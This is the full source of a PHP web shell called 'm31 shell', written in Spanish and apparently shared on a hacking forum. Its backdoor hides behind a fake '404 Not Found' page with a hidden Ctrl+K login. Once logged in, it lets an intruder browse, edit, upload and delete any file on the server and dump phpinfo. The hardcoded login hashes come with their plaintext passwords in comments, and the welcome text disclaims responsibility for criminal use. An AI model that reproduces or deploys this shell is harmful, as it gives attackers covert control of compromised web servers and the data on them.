Untitled

<?php
header('Content-Type: text/html; charset=UTF-8'); //Charset (UTF-8 por defecto)
DEFINE("user","bac6264c63a590e2f727842235697417"); // Usuario: md5(sha1("Aex12"));
DEFINE("pass","fd811cd60a2f8f99b00719117a9bb13c"); // Contraseña: md5(sha1("holoscripter"));
//Opciones de "personalizacion"
$background = "http://fc08.deviantart.net/fs70/i/2011/015/e/3/clarity_by_foolish_fox-d379pzg.jpg"; //fondo de la shell
$body_style = "margin-top:19px; background-repeat:no-repeat; background-attachment:fixed;"; //css de body
$logotipo = "abajo"; // Posibles: arriba, abajo, desactivado.
//Opciones de las sesiones PHP:
$lifetime = "0"; //Tiempo en segundos que durará la sesion. 0 = hasta cerrar navegador.
$maxlifetime = "7200"; //tiempo en segundos que tardará la sesion en caducar en caso de inactividad.
//Opciones del chat:
$wmode = "direct"; //posibles: transparent, opaque, window, direct. (Busca en google)
$quality = "high"; //posibles: high, low, medium
$language = "es"; //posibles: es, en.
$height = "466"; //Alto en pixeles
$width = "790"; //Ancho en pixeles
$bgcolor = "#000000"; //color de fondo en html
$xats = array(
'Holoscripter' => '153256001',
'Chat2' => '21312',
'Chat3' => '123'
);
//Opciones POPUP editar:
$popup_ancho = "650"; //ancho en pixeles del popup editar
$popup_alto = "500"; //alto en pixeles  del popup editar
//combinaciones:
$comb_login = "ctrl+k"; //combinacion de teclas para abrir login
$comb_save = "ctrl+s"; //combinacion de teclas para guardar un archivo mientras se edita.
//iconos para archivos:
$icono_borrar = "http://cdn1.iconfinder.com/data/icons/aspneticons_v1.0_Nov2006/trash_%28delete%29_16x16.gif";
$icono_editar = "http://cdn1.iconfinder.com/data/icons/silk2/page_white_edit.png";
$icono_carpeta = "http://cdn1.iconfinder.com/data/icons/fugue/icon_shadowless/folder_horizontal_open.png";
$icono_desconocido = "http://cdn1.iconfinder.com/data/icons/16x16-free-toolbar-icons/16/file.png";
$iconos = array(
'pdf' => 'http://cdn1.iconfinder.com/data/icons/spirit20/file-pdf.png',
'xls' => 'http://cdn1.iconfinder.com/data/icons/spirit20/file-xls.png',
'php' => 'http://static.php.net/www.php.net/favicon.ico',
'html' => 'http://cdn1.iconfinder.com/data/icons/ledicons/html.png',
'txt' => 'http://cdn1.iconfinder.com/data/icons/16x16-free-toolbar-icons/16/2.png',
'png' => 'http://cdn1.iconfinder.com/data/icons/ledicons/picture.png',
'jpg' => 'http://cdn1.iconfinder.com/data/icons/ledicons/picture.png',
'jpeg' => 'http://cdn1.iconfinder.com/data/icons/ledicons/picture.png',
'gif' => 'http://cdn1.iconfinder.com/data/icons/ledicons/picture.png',
'js' => 'http://cdn1.iconfinder.com/data/icons/silk2/cup_edit.png',
);


session_set_cookie_params($lifetime);
ini_set("session.gc_maxlifetime", $maxlifetime);
session_start();
if(!isset($_GET['page'])){
if(!isset($_SESSION['page'])){
$page = "welcome";
$_SESSION['page'] = "welcome";
} else {
$page = $_SESSION['page'];
}
} else {
$page = $_GET['page'];
$_SESSION['page'] = $_GET['page'];
}

if(isset($_GET['reload'])){
$page = $_SESSION['page'];
}

if($page == "disconnect"){
session_destroy();
header('Location: '.$_SERVER['PHP_SELF']);
}
if((isset($_POST['user'])) && (isset($_POST['pass']))){
$_SESSION['user'] = md5(sha1($_POST['user']));
$_SESSION['pass'] = md5(sha1($_POST['pass']));
}


if(isset($_GET['dir'])){$_SESSION['dir'] = $_GET['dir'];}
if(!isset($_SESSION['dir'])){ $_SESSION['dir'] = getcwd();}
$dir = $_SESSION['dir'];

function extension($ext){
if(strpos($ext,".")){
return end(explode(".", $ext));
} else {
return ".";
}
}

function tamano($peso , $decimales = 2 ) {
$clase = array(" Bytes", " KB", " MB", " GB", " TB");
if($peso != 0){
return round($peso/pow(1024,($i = floor(log($peso, 1024)))),$decimales ).$clase[$i];
} else {
return "0 Bytes";
}
}

function table($nombre, $carpeta=0, $id=0){
global $dir; global $iconos; global $icono_desconocido; global $icono_carpeta; global $icono_borrar; global $icono_editar;
if($carpeta==0){
$extension = extension($nombre);
if(!isset($iconos[$extension])){
$icono = $icono_desconocido;
} else {
$icono = $iconos[$extension];
}
$return =
'<tr id="a_'.$id.'">
<td><img src="'.$icono.'"></td>
<td id="an_'.$id.'">'.$nombre.'</td>
<td>'.tamano(@filesize($nombre)).'</td>
<td><a onClick="edit(\''.$dir.'/'.$nombre.'\');"><img src="'.$icono_editar.'" title="EDITAR '.$nombre.'"></a>&nbsp;<a onClick="delfile(\''.$dir.'/'.$nombre.'\', \'a_'.$id.'\')"><img src="'.$icono_borrar.'" title="ELIMINAR '.$nombre.'"></a></td>
</tr>';
return $return;
} elseif(($nombre == "..") && ($carpeta==1)){
$carpetas = split("/",$dir);
array_pop($carpetas);
$dir2 = join("/",$carpetas);
if($dir2==""){$dir2="/";}
$return =
'<tr>
<td><img src="'.$icono_carpeta.'"></td>
<td><a href="#" onClick="listardir(\''.$dir2.'\')">[Atrás] '.$nombre.'</a></td>
<td></td>
<td></td>
</tr>';
return $return;
} elseif(($nombre == ".") && ($carpeta==1)){
$return =
'<tr>
<td><img src="'.$icono_carpeta.'"></td>
<td><a href="#" onClick="listardir(\''.$dir.'\')">[Recargar] '.$nombre.'</a></td>
<td></td>
<td></td>
</tr>';
return $return;
} elseif($carpeta==1){
if($dir=="/"){$dir="";}
$return =
'<tr>
<td><img src="'.$icono_carpeta.'"></td>
<td><a href="#" onClick="listardir(\''.$dir.'/'.$nombre.'\')">'.$nombre.'</a></td>
<td></td>
<td>Borrar</td>
</tr>';
return $return;
}
}

if(isset($_SESSION['user'])){
if(($_SESSION['user'] == user) && ($_SESSION['pass'] == pass)){
$online = 1;
if((isset($_POST['user'])) && (isset($_POST['pass']))){
exit(header("Location: ".$_SERVER['PHP_SELF']."?page=welcome"));
}
}
}

if(isset($online)){

if(isset($_GET['edit'])){
if(isset($_POST['content'])){
if($fp = @fopen($_GET['edit'],"w")){
fwrite($fp, $_POST['content']);
fclose($fp);
exit('exito');
} else {
exit("error:perm");
}
}
}

if(isset($_GET['edit'])){
$html = stripslashes(htmlspecialchars(file_get_contents($_GET['edit'])));
?>
<script language="javascript" type="text/javascript" src="http://www.cdolivet.com/editarea/editarea/edit_area/edit_area_full.js"></script>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.1/jquery.min.js"></script>
<script src="http://js-hotkeys.googlecode.com/files/jquery.hotkeys-0.7.9.min.js"></script>
<link rel="stylesheet" href="http://fabien-d.github.io/alertify.js/assets/js/lib/alertify/alertify.core.css"/>
<link rel="stylesheet" href="http://fabien-d.github.io/alertify.js/assets/js/lib/alertify/alertify.default.css"/>
<script src="http://fabien-d.github.io/alertify.js/assets/js/lib/alertify/alertify.min.js"></script>
<script language="javascript" type="text/javascript">
editAreaLoader.init({
    id : "a1"
    ,syntax: "php"
    ,language: "es"
    ,save_callback: "check"
    ,display: "later"
    ,toolbar: "save,|,search, go_to_line, fullscreen, |, undo, redo, |, syntax_selection, |, select_font,|, change_smooth_selection, highlight, reset_highlight, word_wrap, |, help"
    ,start_highlight: true
});

function save(content){
$.post("?edit=<?php echo $_GET['edit']; ?>", { content: content })
.done(function(data) {
  if(data == "exito"){
  alertify.success("Editado correctamente!", 2500);
  }

  if(data == "error:perm"){
  alertify.error("No tienes permisos para editar este archivo");
  }
});
}

function check(id, content){
if(id){
save(content);
} else {
save($('#a1').val());
}
}

$(document).bind('keydown', '<?php echo $comb_save; ?>', function (evt) {
       check();
       return false;
    });

</script>
<textarea id="a1" style="width:100%; height:97%; margin-top:0px; margin-left:0px;">
<?php echo $html; ?>
</textarea>
ATENCION: Si tu PC es poco potente no es recomendado activar esta opcion en archivos grandes.
<button onClick="check();">Guardar</button>
<?php
exit();
}

if(isset($_GET['upload'])){
if (array_key_exists('HTTP_X_FILE_NAME', $_SERVER) && array_key_exists('CONTENT_LENGTH', $_SERVER)) {
    $fileName = $_SERVER['HTTP_X_FILE_NAME'];
    $contentLength = $_SERVER['CONTENT_LENGTH'];
} else throw new Exception("Error recibiendo cabeceras");

if (!$contentLength > 0) {
    throw new Exception('No se ha subido ningun archivo!');
}

if($_GET['newname'] == ""){ $_GET['newname'] = $fileName;}
file_put_contents($dir.'/'.$_GET['newname'], file_get_contents("php://input"));
exit();
}

if(isset($_GET['obtenerdir'])){
$_SESSION['dir'] = $_GET['obtenerdir'];
$dir = $_SESSION['dir'];
@chdir($dir);
?>
<script>alertify.log("Carpeta: <?php echo $dir; ?>", "", 2500);</script>
<table class="table table-striped table-condensed" id="table_files" style="width:100%;">
 <thead>
                <tr style="width:100%;">
                  <th style="width:10%;">i</th>
                  <th style="width:40%;">Nombre</th>
                  <th style="width:30%;">Peso</th>
                  <th style="width:20%;"><div class="btn-group">
  <a class="btn dropdown-toggle" data-toggle="dropdown" href="#">
    Acciones
    <span class="caret"></span>
  </a>
  <ul class="dropdown-menu">
    <li><a tabindex="-1" href="#" id="opener" onclick="$('#dialog').dialog('open');">Subir archivos</a></li>
  </ul>
</div></th>
                </tr>
              </thead>
              <tbody>
<?php
$folders = array();
$archivos1 = array();
if(!@opendir($dir)){
echo table('..', 1);
?>
</table>
<hr>
<b>No tienes permisos para visualizar esta carpeta, vuelva atrás.</b>
<?php
exit; }
$directorio=opendir($dir);

while ($archivo = readdir($directorio)) {
 if($archivo == '.'){
 echo table(".", 1);
  } elseif($archivo == '..'){
    if($dir != '.'){
      echo table($archivo, 1);
    }
  }
  elseif(is_dir("$dir/$archivo")){
    $folders[] = $archivo;
  } else {
 $archivos1[] = $archivo;
}

}
closedir($directorio);
$i=0;
@array_multisort(@array_map('strtolower', $folders), $folders);
while ($i < count ($folders) ) {
    echo table($folders[$i], 1);
    $i++;
}

$i=0;
@array_multisort(@array_map('strtolower', $archivos1), $archivos1);
while ($i < count ($archivos1) ) {
    echo table($archivos1[$i], 0, $i);
    $i++;
}
?>
</tbody>
</table>
<?php
exit();
}

if(isset($_GET['delete'])){
if(unlink($_GET['delete'])){
exit("1");
} else {
exit("0");
}
}

if(isset($_GET['ajaxpage'])){
 if($page == "welcome"){ ?>
    <script>alertify.log("Bienvenido!", "", 3000);;</script>
      <div class="hero-unit">
  <h1>Bienvenido a m31</h1>
  <p>Esta es la unica shell hasta el momento que usa jQuery, jQueryUI, Ajax y Bootstrap. Espero que le agrade, ya que ha sido diseñada para ser sencilla de usar, sin tener que renunciar a opciones mas avanzadas. Si no conoce bien el funcionamiento de esta shell, simplemente haga click en el boton "Manual" para ir al hilo oficial de esta shell y recibir mas información acerca de ella. Cordialmente, Aex12.</p>
  <p>No me hago responsable de ningun daño causado con esta shell, todo acto dañino/delictivo será responsabilidad del usuario final.</p>
  <p>
    <a class="btn btn-primary btn-large" href="http://holoscripter.org/foro/index.php?topic=301.0">
      Manual
    </a>
  </p>
</div>
<?php
exit();
}

if($page == "phpinfo"){
echo '<script>alertify.log("PHPInfo", "", 3000);;</script>';
//echo "<div class='well well-small'>";
echo phpinfo();
exit();
//echo "</div>";
}

if($page == "about"){
?>
<script>alertify.log("Acerca de", "", 3000);;</script>
 <div class="hero-unit">
  <h1>m31 shell v0.1.0a</h1><p>
  <br>Shell realizada por Aex12 para la comunidad de Holoscripter.
  <br>El logotipo y favicon han sido diseñados por Exit
  <br>El fondo por defecto está sacado de uno de los wallpapers de Lubuntu 13.04
  <br><br>Se han usado las siguientes librerías:
  <br><a href="http://twitter.github.io/bootstrap/">Bootstrap</a> (CSS), <a href="http://jquery.com/">jQuery</a> (JS), <a href="http://jqueryui.com/">jQuery UI</a> (CSS y JS), <a href="http://fabien-d.github.io/alertify.js/">Alertify</a> (CSS y JS), <a href="http://www.cdolivet.com/editarea/">EditArea</a> (JS), <a href="http://code.google.com/p/js-hotkeys/">HotKeys</a> (JS)
  </p>
</div>
<?php
exit();
}

if($page == "xat"){
?>
<script src="http://localhost/bootstrap/docs/assets/js/bootstrap-tab.js"></script>
<script>
function chateando(xat){
alertify.log("Chateando en: "+xat, "", 3000)
}
</script>
<div class="well well-small">
<div class="tabbable">
  <ul class="nav nav-tabs">
  <?php
  $i = 1;
  foreach ($xats as $clave => $valor) {
   if($i == 1){
    echo '<li class="active"><a href="#tab1" onClick="chateando(\''.$clave.'\')" data-toggle="tab">'.$clave.'</a></li>';
    $i++;
    } else {
    echo '<li><a href="#tab'.$i.'" onClick="chateando(\''.$clave.'\')" data-toggle="tab">'.$clave.'</a></li>';
    $i++;
    }
    } ?>
  </ul>
  <div class="tab-content">
    <?php
  $i = 1;
  foreach ($xats as $clave => $valor) {
  if($i == 1){
  echo '<script>chateando("'.$clave.'");</script>';
    echo '<div class="tab-pane active" id="tab1">';
echo '<embed src="http://www.xatech.com/web_gear/chat/chat.swf" wmode="'.$wmode.'" quality="'.$quality.'" bgcolor="'.$bgcolor.'" width="'.$width.'" height="'.$height.'" name="chat" FlashVars="id='.$valor.'&rl='.$language.'" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://xat.com/update_flash.shtml" />';
    ?>
    <div class="alert alert-info">
    <b>¿No te abren los enlaces?</b> Prueba a usar esta combinación: <i>" Alt Gr + Click "</i>
    </div>
    <?php
    echo '</div>';
    $i++;
    } else {
        echo '<div class="tab-pane" id="tab'.$i.'">';
    echo '<embed src="http://www.xatech.com/web_gear/chat/chat.swf" wmode="'.$wmode.'" quality="'.$quality.'" bgcolor="'.$bgcolor.'" width="'.$width.'" height="'.$height.'" name="chat" FlashVars="id='.$valor.'&rl='.$language.'" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://xat.com/update_flash.shtml" />';
    ?>
    <div class="alert alert-info">
    <b>¿No te abren los enlaces?</b> Prueba a usar esta combinación: <i>" Alt Gr + Click "</i>
    </div>
    <?php
    echo '</div>';
    $i++;
    }
    } ?>
  </div>
  </div>
</div>
<?php
exit();
}

if($page == "files"){ ?>
<script>

  $(document).ready(function () {
  listardir("<?php echo $dir; ?>");
});

function listardir(dir){
$.get('?obtenerdir='+dir, function(data) {
$("#listado").html(data);
});
}
function delfile(del, id){
$.get('?delete='+del, function(data) {
if(data == 1){
var myarray = del.split('/');
alertify.success("Se ha eliminado "+myarray[myarray.length-1], 1000);
$("#"+id).fadeOut(250, function(){ $(this).remove();});
} else {
alertify.error("No se pudo eliminar el archivo", 1000);
}
});
}

function edit(file){
window.open('?edit='+file,'','width=<?php echo $popup_ancho; ?>,height=<?php echo $popup_alto; ?>');
}

  $(function() {
    $("#dialog").dialog({
      autoOpen: false,
      show: {
        effect: "slide",
        duration: 600
      },
      hide: {
        effect: "fold",
        duration: 400
      }
    });
  });
    function nombre(fic) {
  fic = fic.split('\\');
  return fic[fic.length-1];
}

  function uploadFile(file){
    if(file){
alertify.prompt("Elija el nuevo nombre del archivo a subir.", function (e, str) {
    // str is the input text
    if (e) {
            xhr = new XMLHttpRequest();

            xhr.upload.addEventListener('load',function(e){
                alertify.success("El archivo se subio correctamente");
            }, false);

            xhr.upload.addEventListener('error',function(e){
                alertify.error("Hubo algún problema al subir el archivo");
            }, false);

            xhr.open('POST','?upload&newname='+str);

            xhr.setRequestHeader("Cache-Control", "no-cache");
            xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
            xhr.setRequestHeader("X-File-Name", file.name);

            xhr.send(file);
    } else {
        return;
    }
}, nombre($("#archivo").val()));

    }
}


function forceupload(){
    var upload_input = document.querySelectorAll('#archivo')[0];
    uploadFile( upload_input.files[0] );
}
  </script>
<div id="dialog" title="Basic dialog">
  <input type="file" id="archivo"/><br>
  <button onclick="forceupload();">Subir archivo</button>
</div>

<div class="well well-small">
<div id="listado">


</div>
</div>
<?php
exit();
}
}
}

?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.1/jquery.min.js"></script>
<script src="http://js-hotkeys.googlecode.com/files/jquery.hotkeys-0.7.9.min.js"></script>
<link rel="stylesheet" href="http://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css" />
<script src="http://code.jquery.com/ui/1.10.3/jquery-ui.js"></script>
<script src="http://twitter.github.io/bootstrap/assets/js/bootstrap-dropdown.js"></script>
</head>
<?php if(!isset($online)){?>
<body>
<script>
$(document).bind('keydown', '<?php echo $comb_login; ?>', function (evt) {
       $( "#dialog" ).dialog( "open" );
       return false;
    });

  $(function() {
    $("#dialog").dialog({
      autoOpen: false,
      show: {
        effect: "blind",
        duration: 600
      },
      hide: {
        effect: "explode",
        duration: 400
      }
    });
  });
</script>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL <?php echo $_SERVER['PHP_SELF']; ?> was not found on this server.</p>
<hr>
<?php echo $_SERVER['SERVER_SIGNATURE'];  ?>

<div id="dialog" title="Acceso al shell">
 <form name="formu1" method=POST action="">Usuario: <input type="text" name="user"><br>
 Contraseña: <input type="password" name="pass"><br>
<input type="submit" value="Acceder"></form>
</div>
</body></html>
<?php } else { ?>
<link rel="icon" type="image/png" href="http://i.imgur.com/vQEXqX0.png">
<title>m31 Shell By Aex12</title>
<link rel="stylesheet" href="http://bootswatch.com/default/bootstrap.min.css"/>
<link rel="stylesheet" href="http://fabien-d.github.io/alertify.js/assets/js/lib/alertify/alertify.core.css"/>
<link rel="stylesheet" href="http://fabien-d.github.io/alertify.js/assets/js/lib/alertify/alertify.default.css"/>
<script src="http://fabien-d.github.io/alertify.js/assets/js/lib/alertify/alertify.min.js"></script>
<script src="http://twitter.github.io/bootstrap/assets/js/bootstrap-collapse.js"></script>
<body style="<?php echo $body_style; ?>" background="<?php echo $background; ?>">
<div class="container-fluid">
  <div class="row-fluid">
    <div class="span2">
<script>
var antiquepage;
function page(page){
$.get('?page='+page+"&ajaxpage=true", function(data) {
$("#contenido_pagina").html(data);
$("#nav_"+page).addClass("active");
$("#nav_"+antiquepage).removeClass("active");
antiquepage = page;
});
}

function reload(){
$.get('?reload=true&ajaxpage=true', function(data) {
$("#contenido_pagina").html(data);
});
}

page('<?php echo $_SESSION["page"]; ?>');

$(document).bind('keydown', 'f5', function (evt) {
       reload();
       return false;
    });
</script>
<div style="position: fixed">
<?php if($logotipo=="arriba"){
echo '<img src="http://i.imgur.com/wOolqv5.png">';
} ?>
    <div class="well well-small" ><ul class="nav nav-list">
  <li class="nav-header">Básico</li>
  <li id="nav_files" class="<?php if($_SESSION['page'] =='files'){echo 'active';}?>"><a href="?page=files" onclick="page('files'); return false;">Archivos</a></li>
  <li class="nav-header">Avanzado</li>
  <li id="nav_phpinfo" class="<?php if($_SESSION['page'] =='phpinfo'){echo 'active';}?>"><a href="?page=phpinfo" onclick="page('phpinfo'); return false;">phpinfo()</a></li>
  <li class="nav-header">Otros</li>
  <li id="nav_welcome" class="<?php if($_SESSION['page'] =='welcome'){echo 'active';}?>"><a href="?page=welcome" onclick="page('welcome'); return false;">Bienvenido</a></li>
  <li id="nav_xat" class="<?php if($_SESSION['page'] =='xat'){echo 'active';}?>"><a href="?page=xat" onclick="page('xat'); return false;">Chat</a></li>
  <li id="nav_about" class="<?php if($_SESSION['page'] =='about'){echo 'active';}?>"><a href="?page=about" onclick="page('about'); return false;">Acerca de</a></li>
  <li><a href="?page=disconnect">Desconectar</a></li>
</ul></div>
<?php if($logotipo=="abajo"){
echo '<img src="http://i.imgur.com/wOolqv5.png">';
} ?>
    </div>
    </div>
    <div class="span10" id="contenido_pagina">

    </div>
  </div>
</div>
</body>
<?php } ?>